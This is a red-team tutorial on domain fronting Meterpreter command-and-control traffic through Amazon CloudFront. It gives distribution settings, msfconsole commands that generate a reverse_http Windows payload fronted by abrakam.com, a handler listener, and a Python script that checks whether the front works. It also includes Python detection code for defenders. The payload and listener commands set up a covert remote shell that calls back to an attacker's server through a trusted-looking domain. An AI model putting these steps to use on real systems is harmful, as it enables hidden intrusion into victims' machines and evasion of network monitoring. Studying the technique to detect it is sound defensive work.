Domain Fronting with Meterpreter

Domain Fronting is a technique originally used for censorship evasion. It relies on large Content Delivery Networks (CDNs) such as Amazon’s CloudFront to hide the true destination of a connection: the DNS lookup and the TCP connection (and, for HTTPS, the TLS SNI) go to a high-reputation domain that is hosted on the CDN, while the HTTP Host header names the CDN distribution you control. The CDN routes on the Host header, so it forwards the request to your origin. Red Teams use this to hide C2 traffic behind high-reputation redirectors: a network defender sees a connection to the front domain rather than to the C2 server. CDN providers can detect and block the mismatch between the connected name and the Host header, so verify the current behaviour of the CDN you intend to use before relying on it.

For more information on Domain Fronting, please refer to this whitepaper.

Setting up CloudFront

Log in to AWS and navigate to CloudFront. You will need a domain name that you own (or one acquired for free from a registrar such as Freenom). This domain must resolve to the server that will run the Meterpreter handler, because it becomes the origin of the distribution. Once logged in, click Create Distribution. Set the Origin Domain Name to the domain you own. Set the Origin Protocol Policy to Match Viewer so that CloudFront forwards HTTP requests to your origin over HTTP and HTTPS requests over HTTPS.

Origin Settings

Under Default Cache Behavior Settings, we need to tweak a few settings so that the CDN caches as little as possible; a cached response would be served back to the implant instead of reaching the handler.

  1. Under Allowed HTTP Methods, select the option that allows all methods (GET, HEAD, OPTIONS, PUT, POST, PATCH, DELETE); the Meterpreter HTTP transport uses POST as well as GET.
  2. Set Cache Based on Selected Request Headers to All. With this setting CloudFront forwards every request header to the origin and does not cache the responses.
  3. For Forward Cookies, also select All.
  4. For Query String Forwarding and Caching, select Forward all, cache based on all.

Default Cache Behavior Settings

Everything else can be left at default. Click the Create Distribution button at the bottom of the page, and wait for the setup to complete within AWS.

Note: AWS may take a while to propagate the settings to the edge servers; the distribution shows In Progress until it is done. Go ahead with the Meterpreter setup while this completes.

CloudFront In Progress

Meterpreter

At the time of publishing, the Domain Fronting capability (the HttpHostHeader option) had not yet been pushed to the main distribution channels. Per the discussion here, it is only ready for certain payload types and is not yet included in the main Metasploit framework. Rapid7 also hinted at Domain Fronting support in a recent blog.

Since this is not mainstream yet, we need the latest version from GitHub for payload generation only. The handler side works with a stock install: the fronting happens entirely on the client, which sets the Host header so that the CDN acts as a redirector to our C2, and the handler simply receives ordinary HTTP requests forwarded by the CDN.

If you don’t already have a Metasploit development environment setup, there are excellent instructions here.

Choosing a Redirector

As we are using CloudFront for this demonstration, we can choose any popular domain that is also served by CloudFront. [Vincent](https://twitter.com/vysecurity) recently released a large list of frontable domains. For simplicity’s sake I’ve chosen abrakam.com, the second domain in the CloudFront list. Before building a payload, confirm that the front still works: a plain HTTP request to the front domain with the Host header set to your distribution should come back from your own origin, not from abrakam.com.
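The check described above, written out as an added example (this is not code from the original post or from Metasploit). The front domain and the distribution name are the ones used later in this post and are assumptions; the origin table in the offline walk-through is constructed. The script builds the exact request the implant sends, shows the routing decision a CDN makes from the Host header alone, and can run a live check against the front:

```python
"""Check a domain-fronting candidate: connect to the front domain, send the
Host header of our CloudFront distribution, and see whose origin answers.

Added example, not part of the original post or of Metasploit. FRONT and
DISTRIBUTION are assumptions taken from the post."""
import http.client
import socket

FRONT = "abrakam.com"                            # name we resolve and connect to
DISTRIBUTION = "d3k1m3cdd2g9qm.cloudfront.net"   # name we put in the Host header


def build_fronted_request(front, host_header, path="/", method="GET"):
    """Return the raw HTTP/1.1 request bytes the implant sends.

    The TCP connection goes to `front`, but the request names `host_header`;
    that header is the only thing the CDN uses to pick the distribution."""
    return (
        f"{method} {path} HTTP/1.1\r\n"
        f"Host: {host_header}\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


def cdn_route(raw_request, distributions):
    """Toy model of the CDN's routing decision, for illustration only.

    Parses the Host header out of the raw request and returns the origin
    configured for that distribution, or None if no distribution owns the name.
    Note that the name the client connected to never enters the decision."""
    head, _, _ = raw_request.partition(b"\r\n\r\n")
    host = None
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"host":
            host = value.strip().decode()
    return distributions.get(host)


def check_front(front, host_header, path="/", timeout=10):
    """Live check: GET `path` from `front` with a fronted Host header.

    Returns (status, Server header). A response from our own origin confirms
    the front works; a 4xx from the CDN usually means it rejected the mismatch.
    http.client does not add its own Host header when one is supplied."""
    conn = http.client.HTTPConnection(front, 80, timeout=timeout)
    conn.request("GET", path, headers={"Host": host_header, "Connection": "close"})
    resp = conn.getresponse()
    server = resp.getheader("Server", "")
    conn.close()
    return resp.status, server


if __name__ == "__main__":
    # Constructed distribution table with hypothetical origins: ours, and the
    # one that really serves the front domain.
    table = {DISTRIBUTION: "c2.example.com",
             "d111111abcdef8.cloudfront.net": "origin.abrakam.com"}
    req = build_fronted_request(FRONT, DISTRIBUTION)
    print(req.decode())
    print("CDN routes to:", cdn_route(req, table))
    try:
        print("Live check:", check_front(FRONT, DISTRIBUTION))
    except (OSError, socket.timeout) as exc:
        print("Live check failed:", exc)
```

Run it from a host that can reach the front; if the live check returns a page from abrakam.com rather than your origin, or a 4xx from CloudFront, the front is not usable and you should pick another domain from the list.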

Meterpreter Payload Generation

In your recently installed development environment with Metasploit, start up msfconsole.

use payload/windows/meterpreter/reverse_http
set LHOST abrakam.com
set LPORT 80
set HttpHostHeader d3k1m3cdd2g9qm.cloudfront.net
generate -t exe -f /tmp/meterpreter

Note: Change the HttpHostHeader to the domain name that AWS assigned to your distribution (d3k1m3cdd2g9qm.cloudfront.net above is the example distribution). LHOST is the front domain the implant resolves and connects to; HttpHostHeader is what it places in the HTTP Host header. In current Metasploit releases the generate command takes -f for the format and -o for the output file (generate -f exe -o /tmp/meterpreter.exe).

Meterpreter Listener

On the server that you control (the origin of the distribution), also start up msfconsole. The handler must listen on the port CloudFront uses to reach the origin, which is 80 for plain HTTP. Sessions will appear to come from CloudFront’s IP ranges; the victim’s address is in the X-Forwarded-For header that CloudFront adds.

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 0.0.0.0
set LPORT 80
exploit

Wireshark Capture

The following is a screen capture of Wireshark as the agent connects to our Meterpreter handler. Because we used the reverse_http payload the traffic is plaintext, so you can inspect the HTTP request and see that the client connected to abrakam.com but sent a Host header naming our cloudfront.net distribution, and CloudFront forwarded the request to the server of our choice. This mismatch between the name the client resolved and the Host header it sent is also exactly what a defender can look for.

Wireshark capture
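The defender’s view of the capture above, as an added example (not part of the original post): flag HTTP requests whose Host header is not a name the client resolved to the destination IP. The record layout is a simplified, hypothetical version of Zeek-style dns.log and http.log fields, and the sample records are constructed, not captured.

```python
"""Detect plain-HTTP domain fronting by correlating DNS answers with HTTP
requests: a client that resolved abrakam.com, connected to that IP and then
sent Host: <something>.cloudfront.net is fronting.

Added example, not part of the original post. Record layouts are simplified,
hypothetical Zeek-style fields; all sample records below are constructed."""
from collections import defaultdict

# Constructed DNS answers: (client IP, queried name, answered IP)
DNS_RECORDS = [
    ("10.0.0.5", "abrakam.com", "13.32.10.20"),
    ("10.0.0.5", "www.example.org", "93.184.216.34"),
    ("10.0.0.7", "d111111abcdef8.cloudfront.net", "13.32.10.21"),
]

# Constructed HTTP requests: (client IP, dest IP, Host header, method, uri)
HTTP_RECORDS = [
    # Legitimate: Host matches the name the client resolved for that IP
    ("10.0.0.5", "93.184.216.34", "www.example.org", "GET", "/"),
    # Fronted: connected to abrakam.com's IP, Host names our distribution
    ("10.0.0.5", "13.32.10.20", "d3k1m3cdd2g9qm.cloudfront.net", "POST", "/AbcD3fGh"),
    # Client resolved the cloudfront name itself: not fronting
    ("10.0.0.7", "13.32.10.21", "d111111abcdef8.cloudfront.net", "GET", "/app.js"),
    # No DNS seen at all (cached or hard-coded IP); reported separately
    ("10.0.0.9", "13.32.10.22", "d3k1m3cdd2g9qm.cloudfront.net", "GET", "/"),
]


def normalise_host(host):
    """Lower-case the Host header and drop any :port and trailing dot."""
    return host.lower().split(":")[0].rstrip(".")


def index_dns(dns_records):
    """Map (client, ip) -> set of names that client resolved to that IP."""
    seen = defaultdict(set)
    for client, name, ip in dns_records:
        seen[(client, ip)].add(normalise_host(name))
    return seen


def find_fronting(dns_records, http_records):
    """Return findings as (kind, client, dest_ip, host_header, resolved_names).

    kind is "mismatch" when the Host header differs from every name the client
    resolved to the destination IP, and "no_dns" when the client never resolved
    that IP in the window (possible fronting, but also DNS caching)."""
    seen = index_dns(dns_records)
    findings = []
    for client, dest_ip, host, method, uri in http_records:
        names = seen.get((client, dest_ip), set())
        if not names:
            findings.append(("no_dns", client, dest_ip, host, ()))
        elif normalise_host(host) not in names:
            findings.append(("mismatch", client, dest_ip, host, tuple(sorted(names))))
    return findings


if __name__ == "__main__":
    for finding in find_fronting(DNS_RECORDS, HTTP_RECORDS):
        print(finding)
```

Run against real logs, expect noise from DNS caching (the no_dns bucket) and from shared CDN hostnames; the mismatch bucket is the one worth alerting on. For HTTPS there is no Host header on the wire, so the equivalent check compares the TLS SNI with the Host header and needs TLS inspection.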

Demo

Keep an eye out for new payloads supporting the HttpHostHeader option in the advanced settings of Metasploit.

References

  1. Domain Fronting Paper
  2. Metasploit
  3. CloudFront
  4. High Reputation Redirectors and Domain Fronting
  5. Camouflage at encryption layer
  6. Tradecraft Security Weekly